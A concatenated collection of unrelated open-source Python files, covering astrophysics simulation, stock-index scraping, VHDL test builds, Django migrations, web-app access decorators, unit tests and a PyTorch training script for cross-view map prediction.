return u.Quantity(
np.histogram(
self.emitted_packet_nu,
weights=self.emitted_packet_luminosity,
bins=self.spectrum_frequency.value,
)[0],
"erg / s",
)
@property
def montecarlo_virtual_luminosity(self):
return (
self._montecarlo_virtual_luminosity[:-1]
/ self.time_of_simulation.value
)
def calculate_emitted_luminosity(
self, luminosity_nu_start, luminosity_nu_end
):
"""
Calculate emitted luminosity.
Parameters
----------
luminosity_nu_start : astropy.units.Quantity
luminosity_nu_end : astropy.units.Quantity
Returns
-------
astropy.units.Quantity
"""
luminosity_wavelength_filter = (
self.emitted_packet_nu > luminosity_nu_start
) & (self.emitted_packet_nu < luminosity_nu_end)
emitted_luminosity = self.emitted_packet_luminosity[
luminosity_wavelength_filter
].sum()
return emitted_luminosity
def calculate_reabsorbed_luminosity(
self, luminosity_nu_start, luminosity_nu_end
):
"""
Calculate reabsorbed luminosity.
Parameters
----------
luminosity_nu_start : astropy.units.Quantity
luminosity_nu_end : astropy.units.Quantity
Returns
-------
astropy.units.Quantity
"""
luminosity_wavelength_filter = (
self.reabsorbed_packet_nu > luminosity_nu_start
) & (self.reabsorbed_packet_nu < luminosity_nu_end)
reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
luminosity_wavelength_filter
].sum()
return reabsorbed_luminosity
def calculate_radiationfield_properties(self):
"""
Calculate an updated radiation field from the :math:
`\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}`
calculated in the montecarlo simulation.
The details of the calculation can be found in the documentation.
Parameters
----------
nubar_estimator : np.ndarray (float)
j_estimator : np.ndarray (float)
Returns
-------
t_rad : astropy.units.Quantity (float)
w : numpy.ndarray (float)
"""
t_rad = (
self.t_rad_estimator_constant
* self.nu_bar_estimator
/ self.j_estimator
)
w = self.j_estimator / (
4
* const.sigma_sb.cgs.value
* t_rad ** 4
* self.time_of_simulation.value
* self.volume.value
)
return t_rad * u.K, w
def calculate_luminosity_inner(self, model):
"""
Calculate inner luminosity.
Parameters
----------
model : model.Radial1DModel
Returns
-------
astropy.units.Quantity
"""
return (
4
* np.pi
* const.sigma_sb.cgs
* model.r_inner[0] ** 2
* model.t_inner ** 4
).to("erg/s")
def calculate_time_of_simulation(self, model):
"""
Calculate time of montecarlo simulation.
Parameters
----------
model : model.Radial1DModel
Returns
-------
float
"""
return 1.0 * u.erg / self.calculate_luminosity_inner(model)
def calculate_f_nu(self, frequency):
pass
def calculate_f_lambda(self, wavelength):
pass
@classmethod
def from_config(
cls, config, packet_source=None, virtual_packet_logging=False
):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
virtual_packet_logging : bool
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn(
"Disabling electron scattering - this is not physical."
"Likely bug in formal integral - "
"will not give same results."
)
numba_config.SIGMA_THOMSON = 1e-200
# mc_config_module.disable_electron_scattering = True
else:
logger.debug("Electron scattering switched on")
numba_config.SIGMA_THOMSON = const.sigma_T.to("cm^2").value
# mc_config_module.disable_electron_scattering = False
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to("Hz", u.spectral()),
config.spectrum.start.to("Hz", u.spectral()),
num=config.spectrum.num + 1,
)
mc_config_module.disable_line_scattering = (
config.plasma.disable_line_scattering
)
return cls(
seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_spawn_range=config.montecarlo.virtual_spectrum_spawn_range,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual,
spectrum_method=config.spectrum.method,
disable_electron_scattering=config.plasma.disable_electron_scattering,
packet_source=packet_source,
debug_packets=config.montecarlo.debug_packets,
logger_buffer=config.montecarlo.logger_buffer,
single_packet_seed=config.montecarlo.single_packet_seed,
virtual_packet_logging=(
config.spectrum.virtual.virtual_packet_logging
| virtual_packet_logging
),
)
|
py | 7dfa11d01d70e0b2de4387e4d89056a691e8a706 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
龙虎榜数据
Created on 2017年8月13日
@author: Jimmy Liu
@group : waditu
@contact: [email protected]
"""
import pandas as pd
from io import StringIO
from tushare.stock import cons as ct
import time
import re
import lxml.html
from lxml import etree
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib2 import urlopen, Request
def bdi(itype='D', retry_count=3,
pause=0.001):
for _ in range(retry_count):
time.sleep(pause)
try:
request = Request(ct.BDI_URL%(ct.P_TYPE['http'], ct.DOMAINS['v500']))
lines = urlopen(request, timeout = 10).read()
if len(lines) < 100: #no data
return None
except Exception as e:
print(e)
else:
linestr = lines.decode('utf-8') if ct.PY3 else lines
if itype == 'D': # Daily
reg = re.compile(r'\"chart_data\",\"(.*?)\"\);')
lines = reg.findall(linestr)
lines = lines[0]
lines = lines.replace('chart', 'table').\
replace('</series><graphs>', '').\
replace('</graphs>', '').\
replace('series', 'tr').\
replace('value', 'td').\
replace('graph', 'tr').\
replace('graphs', 'td')
df = pd.read_html(lines, encoding='utf8')[0]
df = df.T
df.columns = ['date', 'index']
df['date'] = df['date'].map(lambda x: x.replace(u'年', '-')).\
map(lambda x: x.replace(u'月', '-')).\
map(lambda x: x.replace(u'日', ''))
df['date'] = pd.to_datetime(df['date'])
df['index'] = df['index'].astype(float)
df = df.sort_values('date', ascending=False).reset_index(drop = True)
df['change'] = df['index'].pct_change(-1)
df['change'] = df['change'] * 100
df['change'] = df['change'].map(lambda x: '%.2f' % x)
df['change'] = df['change'].astype(float)
return df
else: #Weekly
html = lxml.html.parse(StringIO(linestr))
res = html.xpath("//table[@class=\"style33\"]/tr/td/table[last()]")
if ct.PY3:
sarr = [etree.tostring(node).decode('utf-8') for node in res]
else:
sarr = [etree.tostring(node) for node in res]
sarr = ''.join(sarr)
sarr = '<table>%s</table>'%sarr
df = pd.read_html(sarr)[0][1:]
df.columns = ['month', 'index']
df['month'] = df['month'].map(lambda x: x.replace(u'年', '-')).\
map(lambda x: x.replace(u'月', ''))
df['month'] = pd.to_datetime(df['month'])
df['month'] = df['month'].map(lambda x: str(x).replace('-', '')).\
map(lambda x: x[:6])
df['index'] = df['index'].astype(float)
df['change'] = df['index'].pct_change(-1)
df['change'] = df['change'].map(lambda x: '%.2f' % x)
df['change'] = df['change'].astype(float)
return df
|
py | 7dfa123e114d54bfeae0745e7534548b7ceb0751 | #!/usr/bin/env python3
from pathlib import Path
from vunit import VUnit
# ROOT
ROOT = Path(__file__).resolve().parent
VU = VUnit.from_argv()
mathlib = VU.add_library("math_library")
mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_base_types_22bit_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/sincos/sincos_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/pi_controller/pi_controller_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/ab_to_abc_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/dq_to_ab_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/multiplier/simulation/tb_multiplier.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_simulation/tb_abc_to_ab_transform.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_simulation/tb_ab_to_dq_transforms.vhd")
mathlib.add_source_files(ROOT / "state_variable/state_variable_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_electrical_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_mechanical_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/permanent_magnet_motor_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_pkg.vhd")
mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_model_pkg.vhd")
mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_simulation/tb_lcr_filter.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/simulate_permanent_magnet_synchronous_machine/tb_permanent_magnet_synchronous_machine_model.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_simulation/tb_field_oriented_motor_control.vhd")
mathlib.add_source_files(ROOT / "inverter_model/inverter_model_pkg.vhd")
mathlib.add_source_files(ROOT / "inverter_model/inverter_model_simulation/tb_inverter_model.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/power_supply_simulation_model_pkg.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/psu_inverter_simulation_models_pkg.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/power_supply_model_simulation/tb_power_supply_model.vhd")
mathlib.add_source_files(ROOT / "state_variable/simulation/tb_state_variable.vhd")
VU.main()
|
py | 7dfa13e634f8cf1f4320f1629fef63754f136d75 | # -*- coding: utf-8 -*-
from django.db import models, migrations
def delete_extra_clipboards(apps, schema_editor):
"""
Delete duplicate clipboards (keep the one with the most files) so a unique
user constraint can be added.
"""
User = apps.get_model("auth", "User")
users = (User.objects.all()
.annotate(nr_clipboards=models.Count('filer_clipboards'))
.filter(nr_clipboards__gt=1))
if not users:
print("Nobody has more than one clipboard. Nothing to do here.")
return
for user in users:
clipboards = user.filer_clipboards.all()
print("Removing duplicate clipboards for {}, id {} (has {})".format(
user, user.id, len(clipboards)))
clipboard_to_stay = max(clipboards, key=lambda c: c.clipboarditem_set.all().count())
for clipboard in clipboards:
if clipboard != clipboard_to_stay:
print("Deleting clipboard with id {}".format(clipboard.id))
clipboard.delete()
def show_rollback_info_message(apps, schema_editor):
print("Clipboards do not need to be changed.")
class Migration(migrations.Migration):
dependencies = [
('filer', '0002_auto_20150928_1109'),
]
operations = [
migrations.RunPython(delete_extra_clipboards,
show_rollback_info_message)
]
|
py | 7dfa149931b5f2e3fe89861575bfba913042a670 | # -*- coding: utf-8 -*-
"""
@Datetime: 2018/10/21
@Author: Zhang Yafei
"""
from kingadmin import sites
from student import models
from kingadmin.admin_base import BaseKingAdmin
print('student kingadmin.....')
class TestAdmin(BaseKingAdmin):
list_display = ['name',]
sites.site.register(models.Test,TestAdmin) |
py | 7dfa151a274491052d2bdf5978745cadadc19ffa | """
This file is part of LiberaForms.
# SPDX-FileCopyrightText: 2020 LiberaForms.org
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
from functools import wraps
from flask import current_app, request, g, jsonify
from flask import redirect, url_for, render_template, flash
from flask_babel import gettext as _
from liberaforms.utils import sanitizers
from liberaforms.utils import validators
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user:
return f(*args, **kwargs)
else:
return redirect(url_for('main_bp.index'))
return wrap
def enabled_user_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.enabled:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Disabled user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return redirect(url_for('main_bp.index'))
return wrap
def enabled_user_required__json(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.enabled:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Disabled user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return jsonify("Denied"), 401
return wrap
def admin_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.is_admin:
return f(*args, **kwargs)
elif g.current_user:
current_app.logger.info(f'Non admin user denied: {request.path}')
else:
current_app.logger.info(f'Anon user denied: {request.path}')
return redirect(url_for('main_bp.index'))
return wrap
def rootuser_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user and g.current_user.is_root_user():
return f(*args, **kwargs)
else:
return redirect(url_for('main_bp.index'))
return wrap
def anon_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if g.current_user:
return redirect(url_for('main_bp.index'))
else:
return f(*args, **kwargs)
return wrap
"""
def queriedForm_editor_required(f):
@wraps(f)
def wrap(*args, **kwargs):
queriedForm=models.Form.find(id=kwargs['id'], editor_id=str(g.current_user.id))
if not queriedForm:
flash(_("Form is not available. 404"), 'warning')
return redirect(make_url_for('forms_bp.my_forms'))
kwargs['queriedForm']=queriedForm
return f(*args, **kwargs)
return wrap
"""
def sanitized_slug_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if not 'slug' in kwargs:
if g.current_user:
flash("No slug found!", 'error')
return render_template('page-not-found.html'), 404
if kwargs['slug'] in current_app.config['RESERVED_SLUGS']:
if g.current_user:
flash("Reserved slug!", 'warning')
return render_template('page-not-found.html'), 404
if kwargs['slug'] != sanitizers.sanitize_slug(kwargs['slug']):
if g.current_user:
flash("That's a nasty slug!", 'warning')
return render_template('page-not-found.html'), 404
return f(*args, **kwargs)
return wrap
def sanitized_key_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if not ('key' in kwargs and kwargs['key'] == sanitizers.sanitize_string(kwargs['key'])):
if g.current_user:
flash(_("That's a nasty key!"), 'warning')
return render_template('page-not-found.html'), 404
else:
return f(*args, **kwargs)
return wrap
def sanitized_token(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'token' in kwargs and not validators.is_valid_UUID(kwargs['token']):
if g.current_user:
flash(_("That's a nasty token!"), 'warning')
return render_template('page-not-found.html'), 404
else:
return f(*args, **kwargs)
return wrap
|
py | 7dfa15f6da20a3dd1327e0038849b925dee6b49a | # coding:utf-8
from base import TestBase
class TestLowercase(TestBase):
"""Test for attributes \'lowercase\'"""
# for debug
# def tearDown(self):
# pass
text = """
<!-- MarkdownTOC autolink=true uri_encoding=false {0} -->
<!-- /MarkdownTOC -->
# ПРИМЕР EXAMPLE
# One Two Three
"""
def get_only_ascii(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-example)", toc)
self.assert_In("- [One Two Three](#one-two-three)", toc)
def get_all(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#пример-example)", toc)
self.assert_In("- [One Two Three](#one-two-three)", toc)
def get_none(self, toc):
self.assert_In("- [ПРИМЕР EXAMPLE](#ПРИМЕР-EXAMPLE)", toc)
self.assert_In("- [One Two Three](#One-Two-Three)", toc)
def test_default(self):
toc = self.init_update(self.text.format(""))["toc"]
self.get_only_ascii(toc)
def test_false(self):
toc = self.init_update(self.text.format('lowercase="false"'))["toc"]
self.get_none(toc)
def test_only_ascii(self):
toc = self.init_update(self.text.format('lowercase="only_ascii"'))["toc"]
self.get_only_ascii(toc)
def test_all(self):
toc = self.init_update(self.text.format('lowercase="all"'))["toc"]
self.get_all(toc)
def test_others(self):
toc = self.init_update(self.text.format('lowercase="xxxxx"'))["toc"]
self.get_all(toc)
|
py | 7dfa1634a6c32fc4deaa34007e9e3f34785377f1 | """
Goal: create a session and database tables
so we can run data tests
@see https://docs.python.org/3/library/unittest.mock-examples.html
"""
import unittest
# from binascii import unhexlify
from mock import patch
from olass import utils
from olass.models import base
from olass.olass_client import OlassClient
from olass.models.patient import Patient
def dummy_get_access_token(*args, **kwargs):
return None
def dummy_get_patient_hashes(*args, **kwargs):
return {}, {}
def dummy_send_hashes_to_server(*args, **kwargs):
return True
class BaseTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(BaseTestCase, self).__init__(*args, **kwargs)
@patch.multiple(OlassClient,
get_access_token=dummy_get_access_token,
# get_patient_hashes=dummy_get_patient_hashes,
send_hashes_to_server=dummy_send_hashes_to_server)
def setUp(self):
""" create all tables """
super(BaseTestCase, self).setUp()
self.app = OlassClient(config_file='config/settings_tests.py',
interactive=False,
create_tables=True)
self.session = self.app.session
self.create_patients()
# TODO: move this line to a dedicated test
self.app.run()
def tearDown(self):
""" remove all tables """
super(BaseTestCase, self).tearDown()
base.metadata.drop_all(self.app.engine)
# self.app.session.remove()
def create_patients(self):
when = utils.format_date('01-01-1950')
Patient.create(
pat_mrn=1,
pat_birth_date=when,
pat_first_name='First',
pat_last_name='Last'
)
|
py | 7dfa168209f210be044e8b4617c273e81b5b458f | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
import paddle
import paddle.fluid.dygraph as dg
import numpy as np
import unittest
class TestComplexReshape(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if fluid.core.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def test_shape_norm_dims(self):
for dtype in self._dtypes:
x_np = np.random.randn(
2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3,
4).astype(dtype)
shape = (2, -1)
for place in self._places:
with dg.guard(place):
x_var = dg.to_variable(x_np)
y_var = paddle.reshape(x_var, shape)
y_np = y_var.numpy()
self.assertTrue(np.allclose(np.reshape(x_np, shape), y_np))
def test_shape_omit_dims(self):
for dtype in self._dtypes:
x_np = np.random.randn(
2, 3, 4).astype(dtype) + 1j * np.random.randn(2, 3,
4).astype(dtype)
shape = (0, -1)
shape_ = (2, 12)
for place in self._places:
with dg.guard(place):
x_var = dg.to_variable(x_np)
y_var = paddle.reshape(x_var, shape)
y_np = y_var.numpy()
self.assertTrue(np.allclose(np.reshape(x_np, shape_), y_np))
if __name__ == "__main__":
unittest.main()
|
py | 7dfa17bddeca8a55544db7ac7e2f2231534abbd1 | import argparse
import os
import random
import time
from pathlib import Path
import crossView
import numpy as np
import copy
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torch import autograd
# from torch.optim.lr_scheduler import ExponentialLR
# from torch.optim.lr_scheduler import StepLR
from torch.optim.lr_scheduler import MultiStepLR
# from torch.optim.lr_scheduler import CosineAnnealingLR
from tensorboardX import SummaryWriter
from PIL import Image
import matplotlib.pyplot as PLT
import matplotlib.cm as mpl_color_map
from opt import get_args
import tqdm
from losses import compute_losses
from utils import mean_IU, mean_precision
def readlines(filename):
"""Read all the lines in a text file and return as a list
"""
with open(filename, 'r') as f:
lines = f.read().splitlines()
return lines
class Trainer:
def __init__(self):
self.opt = get_args()
self.models = {}
self.weight = {"static": self.opt.static_weight, "dynamic": self.opt.dynamic_weight}
self.seed = self.opt.global_seed
self.device = "cuda"
self.criterion_d = nn.BCEWithLogitsLoss()
self.parameters_to_train = []
self.transform_parameters_to_train = []
self.detection_parameters_to_train = []
self.base_parameters_to_train = []
self.parameters_to_train = []
self.parameters_to_train_D = []
self.criterion = compute_losses()
self.create_time = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
self.epoch = 0
self.start_epoch = 0
self.scheduler = 0
# Save log and models path
self.opt.log_root = os.path.join(self.opt.log_root, self.opt.split)
self.opt.save_path = os.path.join(self.opt.save_path, self.opt.split)
if self.opt.split == "argo":
self.opt.log_root = os.path.join(self.opt.log_root, self.opt.type)
self.opt.save_path = os.path.join(self.opt.save_path, self.opt.type)
self.writer = SummaryWriter(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time))
self.log = open(os.path.join(self.opt.log_root, self.opt.model_name, self.create_time,
'%s.csv' % self.opt.model_name), 'w')
if self.seed != 0:
self.set_seed() # set seed
# Initializing models
self.models["encoder"] = crossView.Encoder(18, self.opt.height, self.opt.width, True)
self.models['CycledViewProjection'] = crossView.CycledViewProjection(in_dim=8)
self.models["CrossViewTransformer"] = crossView.CrossViewTransformer(128)
self.models["decoder"] = crossView.Decoder(
self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class)
self.models["transform_decoder"] = crossView.Decoder(
self.models["encoder"].resnet_encoder.num_ch_enc, self.opt.num_class, "transform_decoder")
for key in self.models.keys():
self.models[key].to(self.device)
if "discr" in key:
self.parameters_to_train_D += list(
self.models[key].parameters())
elif "transform" in key:
self.transform_parameters_to_train += list(self.models[key].parameters())
else:
self.base_parameters_to_train += list(self.models[key].parameters())
self.parameters_to_train = [
{"params": self.transform_parameters_to_train, "lr": self.opt.lr_transform},
{"params": self.base_parameters_to_train, "lr": self.opt.lr},
]
# Optimization
self.model_optimizer = optim.Adam(
self.parameters_to_train)
# self.scheduler = ExponentialLR(self.model_optimizer, gamma=0.98)
# self.scheduler = StepLR(self.model_optimizer, step_size=step_size, gamma=0.65)
self.scheduler = MultiStepLR(self.model_optimizer, milestones=self.opt.lr_steps, gamma=0.1)
# self.scheduler = CosineAnnealingLR(self.model_optimizer, T_max=15) # iou 35.55
self.patch = (1, self.opt.occ_map_size // 2 **
4, self.opt.occ_map_size // 2 ** 4)
self.valid = Variable(
torch.Tensor(
np.ones(
(self.opt.batch_size,
*self.patch))),
requires_grad=False).float().cuda()
self.fake = Variable(
torch.Tensor(
np.zeros(
(self.opt.batch_size,
*self.patch))),
requires_grad=False).float().cuda()
# Data Loaders
dataset_dict = {"3Dobject": crossView.KITTIObject,
"odometry": crossView.KITTIOdometry,
"argo": crossView.Argoverse,
"raw": crossView.KITTIRAW,
"habitat": crossView.Habitat}
self.dataset = dataset_dict[self.opt.split]
fpath = os.path.join(
os.path.dirname(__file__),
"splits",
self.opt.split,
"{}_files.txt")
train_filenames = readlines(fpath.format("train"))
val_filenames = readlines(fpath.format("val"))
self.val_filenames = val_filenames
self.train_filenames = train_filenames
train_dataset = self.dataset(self.opt, train_filenames)
val_dataset = self.dataset(self.opt, val_filenames, is_train=False)
self.train_loader = DataLoader(
train_dataset,
self.opt.batch_size,
True,
num_workers=self.opt.num_workers,
pin_memory=True,
drop_last=True)
self.val_loader = DataLoader(
val_dataset,
1,
True,
num_workers=self.opt.num_workers,
pin_memory=True,
drop_last=True)
if self.opt.load_weights_folder != "":
self.load_model()
print("Using split:\n ", self.opt.split)
print(
"There are {:d} training items and {:d} validation items\n".format(
len(train_dataset),
len(val_dataset)))
def train(self):
if not os.path.isdir(self.opt.log_root):
os.mkdir(self.opt.log_root)
self.validation(self.log)
for self.epoch in range(self.start_epoch, self.opt.num_epochs + 1):
self.adjust_learning_rate(self.model_optimizer, self.epoch, self.opt.lr_steps)
loss = self.run_epoch()
output = ("Epoch: %d | lr:%.7f | Loss: %.4f | topview Loss: %.4f | transform_topview Loss: %.4f | "
"transform Loss: %.4f"
% (self.epoch, self.model_optimizer.param_groups[-1]['lr'], loss["loss"], loss["topview_loss"],
loss["transform_topview_loss"], loss["transform_loss"]))
print(output)
self.log.write(output + '\n')
self.log.flush()
for loss_name in loss:
self.writer.add_scalar(loss_name, loss[loss_name], global_step=self.epoch)
if self.epoch % self.opt.log_frequency == 0:
self.validation(self.log)
if self.opt.model_split_save:
self.save_model()
self.save_model()
def process_batch(self, inputs, validation=False):
outputs = {}
for key, input in inputs.items():
if key not in ["filename", "folder", "frame_index"]:
inputs[key] = input.to(self.device)
features = self.models["encoder"](inputs["color"])
# Cross-view Transformation Module
x_feature = features
transform_feature, retransform_features = self.models["CycledViewProjection"](features)
features = self.models["CrossViewTransformer"](features, transform_feature, retransform_features)
# print(inputs["static"].shape)
outputs["topview"] = self.models["decoder"](features)
outputs["transform_topview"] = self.models["transform_decoder"](transform_feature)
if validation:
return outputs
losses = self.criterion(self.opt, self.weight, inputs, outputs, x_feature, retransform_features)
return outputs, losses
def run_epoch(self):
self.model_optimizer.step()
loss = {
"loss": 0.0,
"topview_loss": 0.0,
"transform_loss": 0.0,
"transform_topview_loss": 0.0,
"loss_discr": 0.0
}
accumulation_steps = 8
for batch_idx, inputs in tqdm.tqdm(enumerate(self.train_loader)):
outputs, losses = self.process_batch(inputs)
self.model_optimizer.zero_grad()
losses["loss"] = losses["loss"] / accumulation_steps
losses["loss"].backward()
# if ((batch_idx + 1) % accumulation_steps) == 0:
self.model_optimizer.step()
# self.model_optimizer.zero_grad()
for loss_name in losses:
loss[loss_name] += losses[loss_name].item()
# self.scheduler.step()
for loss_name in loss:
loss[loss_name] /= len(self.train_loader)
return loss
def validation(self, log):
iou, mAP = np.array([0., 0.]), np.array([0., 0.])
trans_iou, trans_mAP = np.array([0., 0.]), np.array([0., 0.])
for batch_idx, inputs in tqdm.tqdm(enumerate(self.val_loader)):
with torch.no_grad():
outputs = self.process_batch(inputs, True)
pred = np.squeeze(
torch.argmax(
outputs["topview"].detach(),
1).cpu().numpy())
true = np.squeeze(
inputs[self.opt.type + "_gt"].detach().cpu().numpy())
iou += mean_IU(pred, true)
mAP += mean_precision(pred, true)
iou /= len(self.val_loader)
mAP /= len(self.val_loader)
# output = ("Epoch: %d | Validation: mIOU: %.4f mAP: %.4f" % (self.epoch, iou[1], mAP[1]))
output = ("Epoch: %d | mIoU (0) %.4f mAP (0): %.4f | mIOU (1): %.4f mAP (1): %.4f" % (self.epoch, iou[0], mAP[0], iou[1], mAP[1]))
print(output)
log.write(output + '\n')
log.flush()
def save_model(self):
save_path = os.path.join(
self.opt.save_path,
self.opt.model_name,
"weights_{}".format(
self.epoch)
)
if not os.path.exists(save_path):
os.makedirs(save_path)
for model_name, model in self.models.items():
model_path = os.path.join(save_path, "{}.pth".format(model_name))
state_dict = model.state_dict()
state_dict['epoch'] = self.epoch
if model_name == "encoder":
state_dict["height"] = self.opt.height
state_dict["width"] = self.opt.width
torch.save(state_dict, model_path)
optim_path = os.path.join(save_path, "{}.pth".format("adam"))
torch.save(self.model_optimizer.state_dict(), optim_path)
def load_model(self):
"""Load model(s) from disk
"""
self.opt.load_weights_folder = os.path.expanduser(
self.opt.load_weights_folder)
assert os.path.isdir(self.opt.load_weights_folder), \
"Cannot find folder {}".format(self.opt.load_weights_folder)
print(
"loading model from folder {}".format(
self.opt.load_weights_folder))
for key in self.models.keys():
if "discriminator" not in key:
print("Loading {} weights...".format(key))
path = os.path.join(
self.opt.load_weights_folder,
"{}.pth".format(key))
model_dict = self.models[key].state_dict()
pretrained_dict = torch.load(path)
if 'epoch' in pretrained_dict:
self.start_epoch = pretrained_dict['epoch']
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
self.models[key].load_state_dict(model_dict)
# loading adam state
if self.opt.load_weights_folder == "":
optimizer_load_path = os.path.join(
self.opt.load_weights_folder, "adam.pth")
if os.path.isfile(optimizer_load_path):
print("Loading Adam weights")
optimizer_dict = torch.load(optimizer_load_path)
self.model_optimizer.load_state_dict(optimizer_dict)
else:
print("Cannot find Adam weights so Adam is randomly initialized")
def adjust_learning_rate(self, optimizer, epoch, lr_steps):
"""Sets the learning rate to the initial LR decayed by 10 every 25 epochs"""
decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))
decay = round(decay, 2)
lr = self.opt.lr * decay
lr_transform = self.opt.lr_transform * decay
decay = self.opt.weight_decay
optimizer.param_groups[0]['lr'] = lr_transform
optimizer.param_groups[1]['lr'] = lr
optimizer.param_groups[0]['weight_decay'] = decay
optimizer.param_groups[1]['weight_decay'] = decay
# for param_group in optimizer.param_groups:
# param_group['lr'] = lr
# param_group['lr'] = lr_transform
# param_group['weight_decay'] = decay
def set_seed(self):
seed = self.seed
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
if __name__ == "__main__":
start_time = time.ctime()
print(start_time)
trainer = Trainer()
trainer.train()
end_time = time.ctime()
print(end_time)
|
py | 7dfa17e2e8c8d9e2431c36ac66b319b483b057c1 | '''OpenGL extension EXT.multi_draw_arrays
This module customises the behaviour of the
OpenGL.raw.GLES1.EXT.multi_draw_arrays to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/multi_draw_arrays.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.EXT.multi_draw_arrays import *
from OpenGL.raw.GLES1.EXT.multi_draw_arrays import _EXTENSION_NAME
def glInitMultiDrawArraysEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiDrawArraysEXT.count size not checked against 'primcount'
# INPUT glMultiDrawArraysEXT.first size not checked against 'primcount'
glMultiDrawArraysEXT=wrapper.wrapper(glMultiDrawArraysEXT).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
)
# INPUT glMultiDrawElementsEXT.count size not checked against 'primcount'
# INPUT glMultiDrawElementsEXT.indices size not checked against 'primcount'
glMultiDrawElementsEXT=wrapper.wrapper(glMultiDrawElementsEXT).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
)
### END AUTOGENERATED SECTION |
py | 7dfa17f68a943749d7a6098ca6a4b70fc91d0b91 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
